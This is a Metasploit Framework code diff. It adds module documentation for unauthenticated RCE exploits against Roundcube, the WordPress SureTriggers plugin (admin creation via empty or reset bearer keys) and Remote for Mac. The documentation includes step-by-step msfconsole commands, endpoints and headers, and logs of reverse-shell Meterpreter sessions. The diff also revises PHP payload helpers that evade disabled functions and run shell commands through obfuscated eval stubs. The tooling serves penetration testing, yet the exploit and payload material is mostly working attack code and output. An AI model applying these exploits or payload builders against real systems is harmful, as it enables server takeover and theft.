+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.129:8082 
+[*] Using URL: http://192.168.159.129:9696/
+[*] Fetching CSRF token...
+[*] Attempting login...
+[+] Login successful.
+[*] Preparing payload...
+[+] Payload successfully generated and serialized.
+[*] Uploading malicious payload...
+[*] Client 192.168.181.148 (curl/7.74.0) requested /
+[*] Sending payload to 192.168.181.148 (curl/7.74.0)
+[*] Sending stage (3045380 bytes) to 192.168.181.148
+[*] Meterpreter session 1 opened (192.168.159.129:8082 -> 192.168.181.148:56528) at 2025-06-06 21:05:59 -0400
+[+] Exploit attempt complete. Check for session.
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+
+meterpreter > sysinfo
+Computer     : dante.local
+OS           : Debian 11.5 (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -1,17 +1,28 @@
 ## Vulnerable Application

-This Metasploit module exploits an administrative user creation vulnerability in the
-WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102).
-The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows
-bypassing permission checks to create a new administrator account.
+This Metasploit module exploits administrative user creation vulnerabilities in the
+WordPress SureTriggers/OttoKit plugin:

-To replicate a vulnerable environment for testing:
+* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
+REST endpoint with an empty `St-Authorization: Bearer` header.
+* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
+followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.

-1. Install WordPress using the provided Docker Compose configuration.
-2. Download and install the SureTriggers plugin v1.0.78:
-   [https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip)
-3. Verify that the plugin is activated and accessible on the local network.
-4. No further configuration is required; vulnerability is present immediately upon activation.
+### To replicate vulnerable environments
+
+1. **SureTriggers v1.0.78 (CVE-2025-3102)**
+
+   * Download & install plugin v1.0.78:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip`
+   * No additional setup is required; the bypass works immediately upon activation.
+
+2. **SureTriggers v1.0.82 (CVE-2025-27007)**
+
+   * Download & install plugin v1.0.82:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip`
+   * No secret key is needed; the exploit will reset it to the specified value.
+
+Both scenarios can be deployed via Docker Compose.

 ## Docker Compose Configuration

@@ -62,131 +73,168 @@ post_max_size = 64M
 ```bash
 docker-compose up -d
 ```
-
-2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555)
-3. Confirm that SureTriggers v1.0.78 is active under **Plugins**
-4. Launch `msfconsole`
-5. Load the module:
+2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
+3. Confirm the targeted SureTriggers version is active under **Plugins**.
+4. In `msfconsole`:

 ```bash
 use exploit/multi/http/wp_suretriggers_auth_bypass
-```
-
-6. Set `RHOSTS` to the target IP
-7. Optionally set `ST_AUTH` if you have an existing key
-8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL`
-9. Execute the exploit with `run`
-
-## Options
-
-* **RHOSTS**: Target IP address or hostname where WordPress is running.
-* **TARGETURI**: Base path to the WordPress installation (default is `/`).
-* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create.
-  By default these are randomly generated but you can set them to values of your choice, for example:
-
-```bash
+set RHOSTS 127.0.0.1
+set TARGETURI /
 set WP_USER eviladmin
 set WP_PASS Str0ngP@ss!
 set WP_EMAIL eviladmin@example.com
 ```

-* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header),
-  you can provide it here to authenticate the REST request.
-  If left empty the module will send an empty header value, which still works on versions <= 1.0.78.
+## Options
+
+* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default).
+* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty).
+* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default).
+* **ACTION**: Exploit to perform:
+
+  * `CVE-2025-3102`
+  * `CVE-2025-27007`

 ## Scenarios

-### Successful Exploitation Against SureTriggers v1.0.78
+### CVE-2025-3102: Empty Bearer Admin Creation

-**Setup:**
+1. Ensure SureTriggers v1.0.78 is active.
+2. In `msfconsole`, set:

-* Local WordPress instance with SureTriggers v1.0.78
-* Metasploit Framework
-
-**Steps:**
-
-1. Start `msfconsole`
-
-2. Load the module:
 ```bash
-use exploit/multi/http/wp_suretriggers_auth_bypass
-```
-3. Configure:
-```bash
-set RHOSTS 127.0.0.1
-set TARGETURI /
-set WP_USER eviladmin
-set WP_PASS Str0ngP@ss!
-run
+set ACTION CVE-2025-3102
 ```
+3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.

-**Expected Results**:
+### CVE-2025-27007: Reset Access Key & Admin Creation
+
+1. Ensure SureTriggers v1.0.82 is active.
+2. In `msfconsole`, set:
+
+```bash
+set ACTION CVE-2025-27007
+```
+3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use
+   `St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.
+
+
+### Expected Results (CVE-2025-3102)

 With `php/meterpreter/reverse_tcp`:

 ```plaintext
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Detected WordPress version: 6.3.2
-[+] Detected suretriggers plugin version: 1.0.78
-[+] The target appears to be vulnerable.
-[*] Attempting to create administrator user via auth bypass...
-[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php...
-[*] Sending stage (40004 bytes) to 172.27.0.2
-[+] Deleted ajax_efdsa.php
-[+] Deleted wp_p2ash.php
-[+] Deleted ../wp_p2ash
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200
+[*] Executing payload at /wp-content/plugins/wp_hkc1z/ajax_kq8xu.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_kq8xu.php
+[+] Deleted wp_hkc1z.php
+[+] Deleted ../wp_hkc1z
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 172.27.0.3:43702) at 2025-05-21 19:35:49 +0200

 meterpreter > sysinfo
-Computer    : a6e792b1c252
-OS          : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
 Meterpreter : php/linux
 ```

 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

 ```plaintext
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets
-
-Exploit targets:
-=================
-
-    Id  Name
-    --  ----
-=>  0   PHP In-Memory
-    1   Unix In-Memory
-    2   Windows In-Memory
-
-
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
 target => 1
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
 payload => cmd/linux/http/x64/meterpreter/reverse_tcp
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Detected WordPress version: 6.3.2
-[+] Detected suretriggers plugin version: 1.0.78
-[+] The target appears to be vulnerable.
-[*] Attempting to create administrator user via auth bypass...
-[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php...
-[*] Sending stage (3045380 bytes) to 172.27.0.2
-[+] Deleted ajax_cqc8l.php
-[+] Deleted wp_ppqii.php
-[+] Deleted ../wp_ppqii
-[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200
+[*] Executing payload at /wp-content/plugins/wp_xtndd/ajax_bmjl3.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_bmjl3.php
+[+] Deleted wp_xtndd.php
+[+] Deleted ../wp_xtndd
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.27.0.3:35176) at 2025-05-21 19:36:44 +0200

 meterpreter > sysinfo
-Computer     : 172.27.0.2
-OS           : Debian 11.8 (Linux 6.14.2-2-cachyos)
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Expected Results (CVE-2025-27007)
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007
+action => CVE-2025-27007
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_kbl7m/ajax_awg0f.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_awg0f.php
+[+] Deleted wp_kbl7m.php
+[+] Deleted ../wp_kbl7m
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.3:52622) at 2025-05-21 19:31:04 +0200
+
+meterpreter > sysinfo
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
+target => 1
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_uozfu/ajax_cqg9q.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_cqg9q.php
+[+] Deleted wp_uozfu.php
+[+] Deleted ../wp_uozfu
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 172.27.0.3:56038) at 2025-05-21 19:33:42 +0200
+
+meterpreter > sysinfo
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
@@ -0,0 +1,40 @@
+# Module Documentation: Remote for Mac 2025.6 - Unauthenticated RCE
+
+## Overview
+
+This module exploits an unauthenticated remote code execution (RCE) vulnerability in **Remote for Mac 2025.6**. When the **"Allow unknown devices"** setting is enabled (disabled by default), the `/api/executeScript` endpoint allows unauthenticated attackers to execute arbitrary AppleScript commands, including shell commands, on the target macOS system.
+
+**Exploit Author:** [Chokri Hammedi](https://packetstormsecurity.com/files/195347/)
+
+**Module Path:** `modules/exploits/osx/http/remote_for_mac_rce.rb`
+
+## Vulnerable Application
+
+- **Vendor:** Evgeny Cherpak
+- **Homepage:** [https://cherpake.com/](https://cherpake.com/)
+- **Download:** [https://cherpake.com/latest.php?os=mac](https://cherpake.com/latest.php?os=mac)
+- **Affected Version:** Remote for Mac 2025.6
+- **Tested on:** macOS Mojave 10.14.6
+
+## Vulnerability Details
+
+- **Endpoint:** `/api/executeScript`
+- **Vulnerability:** Missing authentication
+- **Trigger Condition:** The app must have **"Allow unknown devices"** enabled.
+- **Impact:** Full command execution as the logged-in user.
+
+The exploit sends a specially crafted GET request with AppleScript payload headers to the unauthenticated endpoint. The server executes the `do shell script` AppleScript, leading to remote command execution.
+
+## Usage Example
+
+From within `msfconsole`:
+
+```bash
+use exploit/osx/http/remote_for_mac_rce
+set RHOSTS 192.168.1.100
+set RPORT 443
+set SSL true
+set PAYLOAD cmd/unix/reverse_bash
+set LHOST 192.168.1.50
+run
+
@@ -87,8 +87,11 @@ module Metasploit
            # It doesn't appear to be documented anywhere, but Microsoft gives us a bit
            # of extra information in the e-data section
            begin
-              pa_data_entry = krb_err.res.e_data_as_pa_data_entry
-              if pa_data_entry && pa_data_entry.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_PW_SALT
+              pa_data_entry = krb_err.res.e_data_as_pa_data.find do |pa_data|
+                pa_data.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_PW_SALT
+              end
+
+              if pa_data_entry
                pw_salt = pa_data_entry.decoded_value
                if pw_salt.nt_status
                  case pw_salt.nt_status.value
@@ -107,7 +110,7 @@ module Metasploit
                  Metasploit::Model::Login::Status::DISABLED
                end
              else
-                  Metasploit::Model::Login::Status::DISABLED
+                Metasploit::Model::Login::Status::DISABLED
              end
            rescue Rex::Proto::Kerberos::Model::Error::KerberosDecodingError
              # Could be a non-MS implementation?
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.67"
+      VERSION = "6.4.69"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -49,15 +49,16 @@ module Exploit::PhpEXE
        print_warning("Unable to clean up #{bin_name}, delete it manually")
      end
      p = Rex::Text.encode_base64(generate_payload_exe)
+      vars = Rex::RandomIdentifier::Generator.new(language: :php)
      php = %Q{
-      #{php_preamble}
+      #{php_preamble(vars_generator: vars)}
      $ex = "#{bin_name}";
      $f = fopen($ex, "wb");
      fwrite($f, base64_decode("#{p}"));
      fclose($f);
      chmod($ex, 0777);
      function my_cmd($cmd) {
-      #{php_system_block};
+      #{php_system_block(vars_generator: vars)};
      }
      if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
        my_cmd($ex . "&");
@@ -61,11 +61,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin

    php_code = "<?php #{payload.encoded} ?>"
    if target['Arch'] != ARCH_PHP
-      dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+      vars = Rex::RandomIdentifier::Generator.new(language: :php)
      php_code = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{Rex::Text.encode_base64(payload.encoded)}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+        #{php_preamble(vars_generator: vars)}
+        #{php_system_block(vars_generator: vars, cmd: payload.encoded)}
      END_OF_PHP_CODE
      php_code = php_code + '?>'
    end
@@ -114,7 +114,6 @@ module Msf
      @module_info_copy = info.dup

      self.module_info = info
-      generate_uuid

      set_defaults

@@ -1,13 +1,18 @@
-require 'rex/text'
-
+# NOTE: Metasploit does not use real UUIDs currently.
+# To modify this to be a real UUID we will need to do a database migration.
+# See: https://github.com/rapid7/metasploit-framework/pull/20170
 module Msf::Module::UUID
+  UUID_CHARS = [*('a'..'z'), *('0'..'9')].freeze
+  private_constant :UUID_CHARS
+
  #
  # Attributes
  #

-  # @!attribute [r] uuid
-  #   A unique identifier for this module instance
-  attr_reader :uuid
+  # @return [String] A unique identifier for this module instance
+  def uuid
+    @uuid ||= UUID_CHARS.sample(8).join
+  end

  protected

@@ -17,13 +22,4 @@ module Msf::Module::UUID

  # @!attribute [w] uuid
  attr_writer :uuid
-
-
-  #
-  # Instance Methods
-  #
-
-  def generate_uuid
-    self.uuid = Rex::Text.rand_text_alphanumeric(8).downcase
-  end
 end
@@ -16,15 +16,16 @@ module Msf::Payload::Php
  #
  # @return [String] A chunk of PHP code
  #
-  def php_preamble(options = {})
-    dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    dis = '$' + dis if (dis[0,1] != '$')
+  def self.preamble(options = {})
+    vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }

-    @dis = dis
+    dis = options[:disabled_varname] || vars[:disabled_varname]
+    dis = "$#{dis}" unless dis.start_with?('$')

    # Canonicalize the list of disabled functions to facilitate choosing a
    # system-like function later.
-    preamble = "/*<?php /**/
+    <<~TEXT
+      /*<?php /**/
      @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
      #{dis}=@ini_get('disable_functions');
      if(!empty(#{dis})){
@@ -34,8 +35,11 @@ module Msf::Payload::Php
      }else{
        #{dis}=array();
      }
-      "
-    return preamble
+    TEXT
+  end
+
+  def php_preamble(options = {})
+    Msf::Payload::Php.preamble(options)
  end

  #
@@ -52,54 +56,62 @@ module Msf::Payload::Php
  # @return [String] A chunk of PHP code that, with a little luck, will run a
  #   command.
  #
-  def php_system_block(options = {})
-    cmd = options[:cmd_varname] || '$cmd'
-    dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    output = options[:output_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+  def self.system_block(options = {})
+    vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }

-    if (@dis.nil?)
-      @dis = dis
+    cmd = options[:cmd_varname] || vars[:cmd_varname]
+    dis = options[:disabled_varname] || vars[:disabled_varname]
+    output = options[:output_varname] || vars[:output_varname]
+
+    cmd    = '$' + cmd unless cmd.start_with?('$')
+    dis    = '$' + dis unless dis.start_with?('$')
+    output = '$' + output unless output.start_with?('$')
+
+    is_callable = vars[:is_callable_varname]
+    in_array    = vars[:in_array_varname]
+
+    setup = ''
+    if options[:cmd]
+      setup << <<~TEXT
+        #{cmd}=base64_decode('#{Rex::Text.encode_base64(options[:cmd])}');
+      TEXT
    end
-
-    cmd    = '$' + cmd if (cmd[0,1] != '$')
-    dis    = '$' + dis if (dis[0,1] != '$')
-    output = '$' + output if (output[0,1] != '$')
-
-    is_callable = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    in_array    = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-
-    setup = "
+    setup << <<~TEXT
      if (FALSE!==stristr(PHP_OS,'win')){
        #{cmd}=#{cmd}.\" 2>&1\\n\";
      }
      #{is_callable}='is_callable';
      #{in_array}='in_array';
-      "
-    shell_exec = "
+    TEXT
+    shell_exec = <<~TEXT
      if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){
        #{output}=`#{cmd}`;
-      }else"
-    passthru = "
+      }else
+    TEXT
+    passthru = <<~TEXT
      if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){
        ob_start();
        passthru(#{cmd});
        #{output}=ob_get_contents();
        ob_end_clean();
-      }else"
-    system = "
+      }else
+    TEXT
+    system = <<~TEXT
      if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){
        ob_start();
        system(#{cmd});
        #{output}=ob_get_contents();
        ob_end_clean();
-      }else"
-    exec = "
+      }else
+    TEXT
+    exec = <<~TEXT
      if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){
        #{output}=array();
        exec(#{cmd},#{output});
        #{output}=join(chr(10),#{output}).chr(10);
-      }else"
-    proc_open = "
+      }else
+    TEXT
+    proc_open = <<~TEXT
      if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){
        $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
        #{output}=NULL;
@@ -107,8 +119,9 @@ module Msf::Payload::Php
          #{output}.=fread($pipes[1],1024);
        }
        @proc_close($handle);
-      }else"
-    popen = "
+      }else
+    TEXT
+    popen = <<~TEXT
      if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){
        $fp=popen(#{cmd},'r');
        #{output}=NULL;
@@ -118,7 +131,8 @@ module Msf::Payload::Php
          }
        }
        @pclose($fp);
-      }else"
+      }else
+    TEXT
    # Currently unused until we can figure out how to get output with COM
    # objects (which are not subject to safe mode restrictions) instead of
    # PHP functions.
@@ -128,17 +142,38 @@ module Msf::Payload::Php
    #		$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
    #		#{output} = file_get_contents('%TEMP%\\out.txt');
    #	}else"
-    fail_block = "
+    fail_block = <<~TEXT
      {
        #{output}=0;
      }
-    "
+    TEXT

    exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
    exec_methods = exec_methods.shuffle
-    buf = setup + exec_methods.join("") + fail_block
-
-    return buf
-
+    setup + exec_methods.join("") + fail_block
  end
+
+  def php_system_block(options = {})
+    Msf::Payload::Php.system_block(options)
+  end
+
+  def php_exec_cmd(cmd)
+    vars = Rex::RandomIdentifier::Generator.new(language: :php)
+    <<-END_OF_PHP_CODE
+      #{php_preamble(vars_generator: vars)}
+      #{php_system_block(vars_generator: vars, cmd: cmd)}
+    END_OF_PHP_CODE
+  end
+
+  def self.create_exec_stub(php_code, options = {})
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
+    b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));"
+    b64_stub = "<?php #{b64_stub} ?>" if options.fetch(:wrap_in_tags, true)
+    b64_stub
+  end
+
+  def php_create_exec_stub(php_code)
+    Msf::Payload::PHP.create_exec_stub(php_code)
+  end
+
 end
@@ -8,18 +8,18 @@ module Msf::Payload::Python
  # one line and compatible with all Python versions supported by the Python
  # Meterpreter stage.
  #
-  # @param cmd [String] The python code to execute.
+  # @param python_code [String] The python code to execute.
  # @return [String] Full python stub to execute the command.
  #
-  def self.create_exec_stub(cmd)
+  def self.create_exec_stub(python_code)
    # Encoding is required in order to handle Python's formatting
-    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(cmd))
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(python_code))
    b64_stub = "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{payload}')[0])))"
    b64_stub
  end

-  def py_create_exec_stub(cmd)
-    Msf::Payload::Python.create_exec_stub(cmd)
+  def py_create_exec_stub(python_code)
+    Msf::Payload::Python.create_exec_stub(python_code)
  end

 end
@@ -51,7 +51,9 @@ module Rex
          NT_UID = 5
        end

-        # From padata - https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml
+        # See:
+        # * https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml#pre-authentication
+        # * https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/ae60c948-fda8-45c2-b1d1-a71b484dd1f7

        module PreAuthType
          PA_TGS_REQ = 1
@@ -65,6 +67,7 @@ module Rex
          PA_FOR_USER = 129
          PA_SUPPORTED_ETYPES = 165
          PA_PAC_OPTIONS = 167
+          KERB_SUPERSEDED_BY_USER = 170
        end

        module AuthorizationDataType
@@ -171,6 +171,19 @@ module Rex
                now = Time.now
                skew = (res.stime - now).abs.to_i
                return "#{error_code}. Local time: #{now}, Server time: #{res.stime}, off by #{skew} seconds"
+              elsif error_code == ErrorCodes::KDC_ERR_CLIENT_REVOKED && res&.respond_to?(:e_data) && res.e_data.present?
+                begin
+                  pa_datas = res.e_data_as_pa_data
+                rescue OpenSSL::ASN1::ASN1Error
+                else
+                  pa_data_entry = pa_datas.find do |pa_data|
+                    pa_data.type == Rex::Proto::Kerberos::Model::PreAuthType::KERB_SUPERSEDED_BY_USER
+                  end
+
+                  if pa_data_entry
+                    error_code = "#{error_code}. This account has been superseded by #{pa_data_entry.decoded_value}."
+                  end
+                end
              end

              "Kerberos Error - #{error_code}"
@@ -0,0 +1,85 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class provides a representation of a Kerberos KERB-SUPERSEDED-BY-USER
+        # message as defined in [MS-KILE 2.2.13](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/79170b21-ad15-4a1b-99c4-84b3992d9e70).
+        class KerbSupersededByUser < Element
+
+          attr_accessor :principal_name
+
+          attr_accessor :realm
+
+          def ==(other)
+            realm == other.realm && principal_name == other.principal_name
+          end
+
+          def to_s
+            "#{principal_name}@#{realm}"
+          end
+
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::Sequence
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode KerbSupersededByUser, invalid input'
+            end
+
+            self
+          end
+
+          def encode
+            principal_name_asn1 = OpenSSL::ASN1::ASN1Data.new([encode_principal_name], 1, :CONTEXT_SPECIFIC)
+            realm_asn1 = OpenSSL::ASN1::ASN1Data.new([encode_realm], 2, :CONTEXT_SPECIFIC)
+            seq = OpenSSL::ASN1::Sequence.new([principal_name_asn1, realm_asn1])
+
+            seq.to_der
+          end
+
+          private
+
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+
+            decode_asn1(asn1)
+          end
+
+          # Decodes a Rex::Proto::Kerberos::Model::KerbSupersededByUser from an
+          # OpenSSL::ASN1::Sequence
+          #
+          # @param input [OpenSSL::ASN1::Sequence] the input to decode from
+          def decode_asn1(input)
+            seq_values = input.value
+            self.principal_name = decode_principal_name(seq_values[0])
+            self.realm = decode_realm(seq_values[1])
+          end
+
+         def decode_principal_name(input)
+           PrincipalName.decode(input.value[0])
+          end
+
+          # Decodes the realm from an OpenSSL::ASN1::ASN1Data
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [Array<String>]
+          def decode_realm(input)
+            input.value[0].value
+          end
+
+          def encode_principal_name
+            self.principal_name.encode
+          end
+
+          def encode_realm
+            OpenSSL::ASN1::OctetString.new(self.realm)
+          end
+        end
+      end
+    end
+  end
+end
@@ -72,32 +72,26 @@ module Rex
            raise ::NotImplementedError, 'KrbError encoding not supported'
          end

-          # Decodes the e_data field as an Array<PreAuthDataEntry>
+          # Decodes the e_data field as an Array<PreAuthDataEntry>.
          #
          # @return [Array<Rex::Proto::Kerberos::Model::PreAuthDataEntry>]
          def e_data_as_pa_data
+            return [] unless self.e_data
+
            pre_auth = []
            decoded = OpenSSL::ASN1.decode(self.e_data)
-            decoded.each do |pre_auth_data|
-              pre_auth << Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(pre_auth_data)
+
+            if decoded.first.tag_class == :UNIVERSAL && decoded.first.tag == 16
+              decoded.each do |pre_auth_data|
+                pre_auth << Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(pre_auth_data)
+              end
+            else
+              pre_auth << Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(decoded)
            end

            pre_auth
          end

-          # Decodes the e_data field as a PreAuthData
-          #
-          # @return [Rex::Proto::Kerberos::Model::PreAuthData]
-          def e_data_as_pa_data_entry
-            if self.e_data
-              decoded = OpenSSL::ASN1.decode(self.e_data)
-              Rex::Proto::Kerberos::Model::PreAuthDataEntry.decode(decoded)
-            else
-              # This is implementation-defined, so may be different in some cases
-              nil
-            end
-          end
-
          private

          # Decodes a Rex::Proto::Kerberos::Model::KrbError from an String
@@ -76,6 +76,9 @@ module Rex
            when Rex::Proto::Kerberos::Model::PreAuthType::PA_FOR_USER
              decoded = OpenSSL::ASN1.decode(self.value)
              PreAuthForUser.decode(decoded)
+            when Rex::Proto::Kerberos::Model::PreAuthType::KERB_SUPERSEDED_BY_USER
+              decoded = OpenSSL::ASN1.decode(self.value)
+              KerbSupersededByUser.decode(decoded)
            else
              # Unknown type - just ignore for now
            end
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Auxiliary
      )
    ])

